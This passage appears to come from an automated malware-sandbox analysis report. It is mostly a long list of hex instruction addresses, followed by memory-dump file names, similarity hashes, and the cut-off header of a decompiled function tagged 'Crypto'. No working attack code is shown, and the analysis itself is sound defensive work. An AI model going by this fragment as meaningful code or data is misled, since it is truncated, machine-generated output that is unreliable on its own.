                                                                                                                                                                          0x004071e5
                                                                                                                                                                          0x004071e9
                                                                                                                                                                          0x004071ec
                                                                                                                                                                          0x004071ee
                                                                                                                                                                          0x004071f1
                                                                                                                                                                          0x004071f4
                                                                                                                                                                          0x0040720e
                                                                                                                                                                          0x0040720e
                                                                                                                                                                          0x00407211
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407217
                                                                                                                                                                          0x00407217
                                                                                                                                                                          0x0040721a
                                                                                                                                                                          0x00407221
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407221
                                                                                                                                                                          0x004071f6
                                                                                                                                                                          0x004071f9
                                                                                                                                                                          0x00407200
                                                                                                                                                                          0x00407203
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407229
                                                                                                                                                                          0x00407229
                                                                                                                                                                          0x0040724e
                                                                                                                                                                          0x0040724e
                                                                                                                                                                          0x0040724e
                                                                                                                                                                          0x00407250
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040722e
                                                                                                                                                                          0x0040722e
                                                                                                                                                                          0x00407232
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407238
                                                                                                                                                                          0x00407238
                                                                                                                                                                          0x0040723b
                                                                                                                                                                          0x0040723e
                                                                                                                                                                          0x00407241
                                                                                                                                                                          0x00407243
                                                                                                                                                                          0x00407245
                                                                                                                                                                          0x00407248
                                                                                                                                                                          0x0040724b
                                                                                                                                                                          0x0040724b
                                                                                                                                                                          0x0040724b
                                                                                                                                                                          0x00407252
                                                                                                                                                                          0x0040725a
                                                                                                                                                                          0x0040725d
                                                                                                                                                                          0x00407260
                                                                                                                                                                          0x00407262
                                                                                                                                                                          0x00407265
                                                                                                                                                                          0x00407265
                                                                                                                                                                          0x00407267
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040726d
                                                                                                                                                                          0x0040726d
                                                                                                                                                                          0x00407270
                                                                                                                                                                          0x00407275
                                                                                                                                                                          0x00407277
                                                                                                                                                                          0x0040727d
                                                                                                                                                                          0x0040727f
                                                                                                                                                                          0x00407294
                                                                                                                                                                          0x00407296
                                                                                                                                                                          0x00407296
                                                                                                                                                                          0x00407281
                                                                                                                                                                          0x00407287
                                                                                                                                                                          0x00407289
                                                                                                                                                                          0x0040728b
                                                                                                                                                                          0x0040728b
                                                                                                                                                                          0x00407298
                                                                                                                                                                          0x0040729c
                                                                                                                                                                          0x0040729f
                                                                                                                                                                          0x004072a5
                                                                                                                                                                          0x004072a5
                                                                                                                                                                          0x004072a8
                                                                                                                                                                          0x004072a8
                                                                                                                                                                          0x004072a8
                                                                                                                                                                          0x004072aa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004072b0
                                                                                                                                                                          0x004072b0
                                                                                                                                                                          0x004072b6
                                                                                                                                                                          0x004072b8
                                                                                                                                                                          0x004072dd
                                                                                                                                                                          0x004072e0
                                                                                                                                                                          0x004072e6
                                                                                                                                                                          0x004072eb
                                                                                                                                                                          0x004072f1
                                                                                                                                                                          0x004072f7
                                                                                                                                                                          0x004072f9
                                                                                                                                                                          0x004072fc
                                                                                                                                                                          0x00407305
                                                                                                                                                                          0x0040730b
                                                                                                                                                                          0x0040730b
                                                                                                                                                                          0x004072fe
                                                                                                                                                                          0x00407300
                                                                                                                                                                          0x00407302
                                                                                                                                                                          0x00407302
                                                                                                                                                                          0x0040730d
                                                                                                                                                                          0x00407313
                                                                                                                                                                          0x00407315
                                                                                                                                                                          0x00407318
                                                                                                                                                                          0x0040731a
                                                                                                                                                                          0x00407320
                                                                                                                                                                          0x00407322
                                                                                                                                                                          0x00407324
                                                                                                                                                                          0x00407326
                                                                                                                                                                          0x00407328
                                                                                                                                                                          0x0040732b
                                                                                                                                                                          0x00407334
                                                                                                                                                                          0x00407337
                                                                                                                                                                          0x00407337
                                                                                                                                                                          0x0040732d
                                                                                                                                                                          0x0040732d
                                                                                                                                                                          0x00407330
                                                                                                                                                                          0x00407330
                                                                                                                                                                          0x0040732b
                                                                                                                                                                          0x00407322
                                                                                                                                                                          0x00407339
                                                                                                                                                                          0x0040733b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040733b
                                                                                                                                                                          0x004072ba
                                                                                                                                                                          0x004072ba
                                                                                                                                                                          0x004072c0
                                                                                                                                                                          0x004072c6
                                                                                                                                                                          0x004072c8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004072ca
                                                                                                                                                                          0x004072ca
                                                                                                                                                                          0x004072cc
                                                                                                                                                                          0x004072ce
                                                                                                                                                                          0x004072d7
                                                                                                                                                                          0x004072d7
                                                                                                                                                                          0x004072d0
                                                                                                                                                                          0x004072d0
                                                                                                                                                                          0x004072d3
                                                                                                                                                                          0x004072d3
                                                                                                                                                                          0x004072d9
                                                                                                                                                                          0x004072db
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407341
                                                                                                                                                                          0x00407341
                                                                                                                                                                          0x00407346
                                                                                                                                                                          0x00407348
                                                                                                                                                                          0x00407349
                                                                                                                                                                          0x0040734a
                                                                                                                                                                          0x0040734b
                                                                                                                                                                          0x00407351
                                                                                                                                                                          0x00407354
                                                                                                                                                                          0x00407357
                                                                                                                                                                          0x0040735a
                                                                                                                                                                          0x0040735c
                                                                                                                                                                          0x00407362
                                                                                                                                                                          0x00407362
                                                                                                                                                                          0x00407365
                                                                                                                                                                          0x00407365
                                                                                                                                                                          0x00407365
                                                                                                                                                                          0x00407365
                                                                                                                                                                          0x0040736e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407373
                                                                                                                                                                          0x00407373
                                                                                                                                                                          0x00407376
                                                                                                                                                                          0x00407379
                                                                                                                                                                          0x0040737b
                                                                                                                                                                          0x00407412
                                                                                                                                                                          0x00407412
                                                                                                                                                                          0x00407415
                                                                                                                                                                          0x00407417
                                                                                                                                                                          0x00407418
                                                                                                                                                                          0x00407419
                                                                                                                                                                          0x0040741c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040741c
                                                                                                                                                                          0x00407381
                                                                                                                                                                          0x00407381
                                                                                                                                                                          0x00407387
                                                                                                                                                                          0x00407389
                                                                                                                                                                          0x004073ae
                                                                                                                                                                          0x004073b1
                                                                                                                                                                          0x004073b7
                                                                                                                                                                          0x004073bc
                                                                                                                                                                          0x004073c2
                                                                                                                                                                          0x004073c8
                                                                                                                                                                          0x004073ca
                                                                                                                                                                          0x004073cd
                                                                                                                                                                          0x004073d6
                                                                                                                                                                          0x004073dc
                                                                                                                                                                          0x004073dc
                                                                                                                                                                          0x004073cf
                                                                                                                                                                          0x004073d1
                                                                                                                                                                          0x004073d3
                                                                                                                                                                          0x004073d3
                                                                                                                                                                          0x004073de
                                                                                                                                                                          0x004073e4
                                                                                                                                                                          0x004073e6
                                                                                                                                                                          0x004073e9
                                                                                                                                                                          0x004073eb
                                                                                                                                                                          0x004073f1
                                                                                                                                                                          0x004073f3
                                                                                                                                                                          0x004073f5
                                                                                                                                                                          0x004073f7
                                                                                                                                                                          0x004073f9
                                                                                                                                                                          0x004073fc
                                                                                                                                                                          0x00407405
                                                                                                                                                                          0x00407408
                                                                                                                                                                          0x00407408
                                                                                                                                                                          0x004073fe
                                                                                                                                                                          0x004073fe
                                                                                                                                                                          0x00407401
                                                                                                                                                                          0x00407401
                                                                                                                                                                          0x004073fc
                                                                                                                                                                          0x004073f3
                                                                                                                                                                          0x0040740a
                                                                                                                                                                          0x0040740c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040740c
                                                                                                                                                                          0x0040738b
                                                                                                                                                                          0x0040738b
                                                                                                                                                                          0x00407391
                                                                                                                                                                          0x00407397
                                                                                                                                                                          0x00407399
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040739b
                                                                                                                                                                          0x0040739b
                                                                                                                                                                          0x0040739d
                                                                                                                                                                          0x0040739f
                                                                                                                                                                          0x004073a6
                                                                                                                                                                          0x004073a6
                                                                                                                                                                          0x004073a8
                                                                                                                                                                          0x004073a1
                                                                                                                                                                          0x004073a1
                                                                                                                                                                          0x004073a3
                                                                                                                                                                          0x004073a3
                                                                                                                                                                          0x004073aa
                                                                                                                                                                          0x004073ac
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407424
                                                                                                                                                                          0x00407424
                                                                                                                                                                          0x00407427
                                                                                                                                                                          0x00407429
                                                                                                                                                                          0x0040742c
                                                                                                                                                                          0x0040742f
                                                                                                                                                                          0x0040742f
                                                                                                                                                                          0x0040742f
                                                                                                                                                                          0x0040742f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406add
                                                                                                                                                                          0x00406ac1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406ac7
                                                                                                                                                                          0x00406aca
                                                                                                                                                                          0x00406ad4
                                                                                                                                                                          0x00406ad7
                                                                                                                                                                          0x00406ada
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406ada
                                                                                                                                                                          0x00406ac1
                                                                                                                                                                          0x00406ae5
                                                                                                                                                                          0x00406ae8
                                                                                                                                                                          0x00406aec
                                                                                                                                                                          0x00406af6
                                                                                                                                                                          0x00406b00
                                                                                                                                                                          0x00406b03
                                                                                                                                                                          0x00406b09
                                                                                                                                                                          0x00406c3d
                                                                                                                                                                          0x00406c3f
                                                                                                                                                                          0x00406c45
                                                                                                                                                                          0x00406c48
                                                                                                                                                                          0x00406c4b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406c4b
                                                                                                                                                                          0x00406b0f
                                                                                                                                                                          0x00406b0f
                                                                                                                                                                          0x00406b10
                                                                                                                                                                          0x00406b68
                                                                                                                                                                          0x00406b68
                                                                                                                                                                          0x00406b6f
                                                                                                                                                                          0x00406c15
                                                                                                                                                                          0x00406c15
                                                                                                                                                                          0x00406c1a
                                                                                                                                                                          0x00406c1d
                                                                                                                                                                          0x00406c22
                                                                                                                                                                          0x00406c25
                                                                                                                                                                          0x00406c2a
                                                                                                                                                                          0x00406c2d
                                                                                                                                                                          0x00406c32
                                                                                                                                                                          0x00406c35
                                                                                                                                                                          0x00406c35
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406b75
                                                                                                                                                                          0x00406b75
                                                                                                                                                                          0x00406b75
                                                                                                                                                                          0x00406b75
                                                                                                                                                                          0x00406b79
                                                                                                                                                                          0x00406b79
                                                                                                                                                                          0x00406b9b
                                                                                                                                                                          0x00406b9e
                                                                                                                                                                          0x00406ba0
                                                                                                                                                                          0x00406ba3
                                                                                                                                                                          0x00406ba8
                                                                                                                                                                          0x00406b7e
                                                                                                                                                                          0x00406b7e
                                                                                                                                                                          0x00406b83
                                                                                                                                                                          0x00406b85
                                                                                                                                                                          0x00406b87
                                                                                                                                                                          0x00406b8c
                                                                                                                                                                          0x00406b92
                                                                                                                                                                          0x00406b97
                                                                                                                                                                          0x00406b99
                                                                                                                                                                          0x00406b99
                                                                                                                                                                          0x00406b8e
                                                                                                                                                                          0x00406b8e
                                                                                                                                                                          0x00406b8e
                                                                                                                                                                          0x00406b8c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406baa
                                                                                                                                                                          0x00406bd7
                                                                                                                                                                          0x00406bdc
                                                                                                                                                                          0x00406bde
                                                                                                                                                                          0x00406bdf
                                                                                                                                                                          0x00406be1
                                                                                                                                                                          0x00406be2
                                                                                                                                                                          0x00406be2
                                                                                                                                                                          0x00406be2
                                                                                                                                                                          0x00406c0a
                                                                                                                                                                          0x00406c0f
                                                                                                                                                                          0x00406c0f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406c0f
                                                                                                                                                                          0x00406ba8
                                                                                                                                                                          0x00406b6f
                                                                                                                                                                          0x00406b12
                                                                                                                                                                          0x00406b12
                                                                                                                                                                          0x00406b13
                                                                                                                                                                          0x00406b5d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406b5d
                                                                                                                                                                          0x00406b15
                                                                                                                                                                          0x00406b16
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406c72
                                                                                                                                                                          0x00406c72
                                                                                                                                                                          0x00406c72
                                                                                                                                                                          0x00406c75
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406c52
                                                                                                                                                                          0x00406c52
                                                                                                                                                                          0x00406c56
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406c5c
                                                                                                                                                                          0x00406c5c
                                                                                                                                                                          0x00406c5f
                                                                                                                                                                          0x00406c62
                                                                                                                                                                          0x00406c67
                                                                                                                                                                          0x00406c69
                                                                                                                                                                          0x00406c6c
                                                                                                                                                                          0x00406c6f
                                                                                                                                                                          0x00406c6f
                                                                                                                                                                          0x00406c6f
                                                                                                                                                                          0x00406c77
                                                                                                                                                                          0x00406c77
                                                                                                                                                                          0x00406c7a
                                                                                                                                                                          0x00406c7c
                                                                                                                                                                          0x00406c81
                                                                                                                                                                          0x00406c84
                                                                                                                                                                          0x00406c86
                                                                                                                                                                          0x00406c89
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406c8f
                                                                                                                                                                          0x00406c8f
                                                                                                                                                                          0x00406c91
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406c97
                                                                                                                                                                          0x00406c97
                                                                                                                                                                          0x00406c9b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406ca1
                                                                                                                                                                          0x00406ca1
                                                                                                                                                                          0x00406ca4
                                                                                                                                                                          0x00406ca6
                                                                                                                                                                          0x00406d44
                                                                                                                                                                          0x00406d44
                                                                                                                                                                          0x00406d47
                                                                                                                                                                          0x00406d49
                                                                                                                                                                          0x00406d49
                                                                                                                                                                          0x00406d4c
                                                                                                                                                                          0x00406d4f
                                                                                                                                                                          0x00406d51
                                                                                                                                                                          0x00406d53
                                                                                                                                                                          0x00406d55
                                                                                                                                                                          0x00406d55
                                                                                                                                                                          0x00406d5e
                                                                                                                                                                          0x00406d63
                                                                                                                                                                          0x00406d66
                                                                                                                                                                          0x00406d69
                                                                                                                                                                          0x00406d6c
                                                                                                                                                                          0x00406d6f
                                                                                                                                                                          0x00406d6f
                                                                                                                                                                          0x00406d6f
                                                                                                                                                                          0x00406d72
                                                                                                                                                                          0x00406d78
                                                                                                                                                                          0x00406d78
                                                                                                                                                                          0x00406d7e
                                                                                                                                                                          0x00406d7e
                                                                                                                                                                          0x00406d7e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406d72
                                                                                                                                                                          0x00406cac
                                                                                                                                                                          0x00406cac
                                                                                                                                                                          0x00406cb2
                                                                                                                                                                          0x00406cb5
                                                                                                                                                                          0x00406cb7
                                                                                                                                                                          0x00406ce2
                                                                                                                                                                          0x00406ce5
                                                                                                                                                                          0x00406ceb
                                                                                                                                                                          0x00406cf0
                                                                                                                                                                          0x00406cf6
                                                                                                                                                                          0x00406cfc
                                                                                                                                                                          0x00406cfe
                                                                                                                                                                          0x00406d01
                                                                                                                                                                          0x00406d0a
                                                                                                                                                                          0x00406d10
                                                                                                                                                                          0x00406d10
                                                                                                                                                                          0x00406d03
                                                                                                                                                                          0x00406d05
                                                                                                                                                                          0x00406d07
                                                                                                                                                                          0x00406d07
                                                                                                                                                                          0x00406d12
                                                                                                                                                                          0x00406d18
                                                                                                                                                                          0x00406d1b
                                                                                                                                                                          0x00406d1d
                                                                                                                                                                          0x00406d1f
                                                                                                                                                                          0x00406d25
                                                                                                                                                                          0x00406d27
                                                                                                                                                                          0x00406d29
                                                                                                                                                                          0x00406d2c
                                                                                                                                                                          0x00406d35
                                                                                                                                                                          0x00406d35
                                                                                                                                                                          0x00406d37
                                                                                                                                                                          0x00406d2e
                                                                                                                                                                          0x00406d2e
                                                                                                                                                                          0x00406d31
                                                                                                                                                                          0x00406d31
                                                                                                                                                                          0x00406d39
                                                                                                                                                                          0x00406d39
                                                                                                                                                                          0x00406d27
                                                                                                                                                                          0x00406d3c
                                                                                                                                                                          0x00406d3e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406d3e
                                                                                                                                                                          0x00406cb9
                                                                                                                                                                          0x00406cb9
                                                                                                                                                                          0x00406cbf
                                                                                                                                                                          0x00406cc5
                                                                                                                                                                          0x00406cc7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406cc9
                                                                                                                                                                          0x00406cc9
                                                                                                                                                                          0x00406ccb
                                                                                                                                                                          0x00406ccd
                                                                                                                                                                          0x00406cd0
                                                                                                                                                                          0x00406cd7
                                                                                                                                                                          0x00406cd7
                                                                                                                                                                          0x00406cd9
                                                                                                                                                                          0x00406cd2
                                                                                                                                                                          0x00406cd2
                                                                                                                                                                          0x00406cd4
                                                                                                                                                                          0x00406cd4
                                                                                                                                                                          0x00406cdb
                                                                                                                                                                          0x00406cdd
                                                                                                                                                                          0x00406ce0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406de4
                                                                                                                                                                          0x00406de7
                                                                                                                                                                          0x00406dea
                                                                                                                                                                          0x00406df0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406fc7
                                                                                                                                                                          0x00406fc7
                                                                                                                                                                          0x00406fc7
                                                                                                                                                                          0x00406fca
                                                                                                                                                                          0x00406fcd
                                                                                                                                                                          0x00406fcf
                                                                                                                                                                          0x00406fd2
                                                                                                                                                                          0x00406fd8
                                                                                                                                                                          0x00406fdf
                                                                                                                                                                          0x00406fe1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406eb5
                                                                                                                                                                          0x00406eb5
                                                                                                                                                                          0x00406edd
                                                                                                                                                                          0x00406edd
                                                                                                                                                                          0x00406edd
                                                                                                                                                                          0x00406edf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406ebd
                                                                                                                                                                          0x00406ebd
                                                                                                                                                                          0x00406ec1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406ec7
                                                                                                                                                                          0x00406ec7
                                                                                                                                                                          0x00406eca
                                                                                                                                                                          0x00406ecd
                                                                                                                                                                          0x00406ed0
                                                                                                                                                                          0x00406ed2
                                                                                                                                                                          0x00406ed4
                                                                                                                                                                          0x00406ed7
                                                                                                                                                                          0x00406eda
                                                                                                                                                                          0x00406eda
                                                                                                                                                                          0x00406eda
                                                                                                                                                                          0x00406ee1
                                                                                                                                                                          0x00406ee1
                                                                                                                                                                          0x00406ee9
                                                                                                                                                                          0x00406eec
                                                                                                                                                                          0x00406ef2
                                                                                                                                                                          0x00406ef5
                                                                                                                                                                          0x00406ef9
                                                                                                                                                                          0x00406efd
                                                                                                                                                                          0x00406f00
                                                                                                                                                                          0x00406f03
                                                                                                                                                                          0x00406f1b
                                                                                                                                                                          0x00406f1b
                                                                                                                                                                          0x00406f1e
                                                                                                                                                                          0x00406f2c
                                                                                                                                                                          0x00406f2f
                                                                                                                                                                          0x00406f20
                                                                                                                                                                          0x00406f20
                                                                                                                                                                          0x00406f22
                                                                                                                                                                          0x00406f29
                                                                                                                                                                          0x00406f29
                                                                                                                                                                          0x00406f58
                                                                                                                                                                          0x00406f58
                                                                                                                                                                          0x00406f58
                                                                                                                                                                          0x00406f5b
                                                                                                                                                                          0x00406f5d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406f38
                                                                                                                                                                          0x00406f38
                                                                                                                                                                          0x00406f3c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406f42
                                                                                                                                                                          0x00406f42
                                                                                                                                                                          0x00406f45
                                                                                                                                                                          0x00406f48
                                                                                                                                                                          0x00406f4b
                                                                                                                                                                          0x00406f4d
                                                                                                                                                                          0x00406f4f
                                                                                                                                                                          0x00406f52
                                                                                                                                                                          0x00406f55
                                                                                                                                                                          0x00406f55
                                                                                                                                                                          0x00406f55
                                                                                                                                                                          0x00406f5f
                                                                                                                                                                          0x00406f5f
                                                                                                                                                                          0x00406f61
                                                                                                                                                                          0x00406f63
                                                                                                                                                                          0x00406f6e
                                                                                                                                                                          0x00406f71
                                                                                                                                                                          0x00406f74
                                                                                                                                                                          0x00406f76
                                                                                                                                                                          0x00406f78
                                                                                                                                                                          0x00406f7a
                                                                                                                                                                          0x00406f7d
                                                                                                                                                                          0x00406f80
                                                                                                                                                                          0x00406f85
                                                                                                                                                                          0x00406f88
                                                                                                                                                                          0x00406f8b
                                                                                                                                                                          0x00406f8e
                                                                                                                                                                          0x00406f95
                                                                                                                                                                          0x00406f98
                                                                                                                                                                          0x00406f9a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406fa0
                                                                                                                                                                          0x00406fa0
                                                                                                                                                                          0x00406fa4
                                                                                                                                                                          0x00406fb5
                                                                                                                                                                          0x00406fb5
                                                                                                                                                                          0x00406fb5
                                                                                                                                                                          0x00406fb7
                                                                                                                                                                          0x00406fb7
                                                                                                                                                                          0x00406fbb
                                                                                                                                                                          0x00406fbb
                                                                                                                                                                          0x00406fbb
                                                                                                                                                                          0x00406fbd
                                                                                                                                                                          0x00406fbe
                                                                                                                                                                          0x00406fc1
                                                                                                                                                                          0x00406fc1
                                                                                                                                                                          0x00406fc1
                                                                                                                                                                          0x00406fc4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406fc4
                                                                                                                                                                          0x00406fa6
                                                                                                                                                                          0x00406fa6
                                                                                                                                                                          0x00406fa9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406faf
                                                                                                                                                                          0x00406faf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406faf
                                                                                                                                                                          0x00406f05
                                                                                                                                                                          0x00406f05
                                                                                                                                                                          0x00406f07
                                                                                                                                                                          0x00406f09
                                                                                                                                                                          0x00406f0c
                                                                                                                                                                          0x00406f0f
                                                                                                                                                                          0x00406f13
                                                                                                                                                                          0x00406f13
                                                                                                                                                                          0x00406fe7
                                                                                                                                                                          0x00406fe7
                                                                                                                                                                          0x00406fea
                                                                                                                                                                          0x00406ff1
                                                                                                                                                                          0x00406ff5
                                                                                                                                                                          0x00406ff7
                                                                                                                                                                          0x00406ffa
                                                                                                                                                                          0x00406ffd
                                                                                                                                                                          0x00407002
                                                                                                                                                                          0x00407005
                                                                                                                                                                          0x00407007
                                                                                                                                                                          0x00407008
                                                                                                                                                                          0x0040700b
                                                                                                                                                                          0x00407016
                                                                                                                                                                          0x00407019
                                                                                                                                                                          0x00407030
                                                                                                                                                                          0x00407035
                                                                                                                                                                          0x0040703c
                                                                                                                                                                          0x00407041
                                                                                                                                                                          0x00407045
                                                                                                                                                                          0x00407047
                                                                                                                                                                          0x00407047
                                                                                                                                                                          0x00407047
                                                                                                                                                                          0x0040704a
                                                                                                                                                                          0x0040704c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407052
                                                                                                                                                                          0x00407052
                                                                                                                                                                          0x00407056
                                                                                                                                                                          0x00407061
                                                                                                                                                                          0x00407074
                                                                                                                                                                          0x00407079
                                                                                                                                                                          0x0040707e
                                                                                                                                                                          0x00407080
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407086
                                                                                                                                                                          0x00407086
                                                                                                                                                                          0x00407089
                                                                                                                                                                          0x0040708b
                                                                                                                                                                          0x00407099
                                                                                                                                                                          0x00407099
                                                                                                                                                                          0x0040709c
                                                                                                                                                                          0x0040709c
                                                                                                                                                                          0x0040709f
                                                                                                                                                                          0x004070a2
                                                                                                                                                                          0x004070a5
                                                                                                                                                                          0x004070a8
                                                                                                                                                                          0x004070ab
                                                                                                                                                                          0x004070ae
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004070ae
                                                                                                                                                                          0x0040708d
                                                                                                                                                                          0x0040708d
                                                                                                                                                                          0x00407093
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407093
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407432
                                                                                                                                                                          0x00407432
                                                                                                                                                                          0x00407438
                                                                                                                                                                          0x0040743e
                                                                                                                                                                          0x00407443
                                                                                                                                                                          0x00407449
                                                                                                                                                                          0x0040744f
                                                                                                                                                                          0x00407451
                                                                                                                                                                          0x00407454
                                                                                                                                                                          0x0040745d
                                                                                                                                                                          0x00407463
                                                                                                                                                                          0x00407463
                                                                                                                                                                          0x00407456
                                                                                                                                                                          0x00407458
                                                                                                                                                                          0x0040745a
                                                                                                                                                                          0x0040745a
                                                                                                                                                                          0x00407465
                                                                                                                                                                          0x00407467
                                                                                                                                                                          0x0040746a
                                                                                                                                                                          0x004074a5
                                                                                                                                                                          0x004074a5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040746c
                                                                                                                                                                          0x0040746c
                                                                                                                                                                          0x0040746c
                                                                                                                                                                          0x00407472
                                                                                                                                                                          0x00407475
                                                                                                                                                                          0x00407477
                                                                                                                                                                          0x004074ac
                                                                                                                                                                          0x004074ae
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004074ae
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407477
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406ab6
                                                                                                                                                                          0x00407484
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407484
                                                                                                                                                                          0x00406e98
                                                                                                                                                                          0x00406e9a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406e9c
                                                                                                                                                                          0x00406e9c
                                                                                                                                                                          0x00406e9f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406e9f
                                                                                                                                                                          0x00406de4
                                                                                                                                                                          0x00406da5
                                                                                                                                                                          0x00407489
                                                                                                                                                                          0x0040748c
                                                                                                                                                                          0x0040748e
                                                                                                                                                                          0x00407497
                                                                                                                                                                          0x0040749d
                                                                                                                                                                          0x00000000

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                                                                          • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                                                                                                                          • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                                                                          • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040755C, Relevance: .3, Instructions: 300COMMONCrypto
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
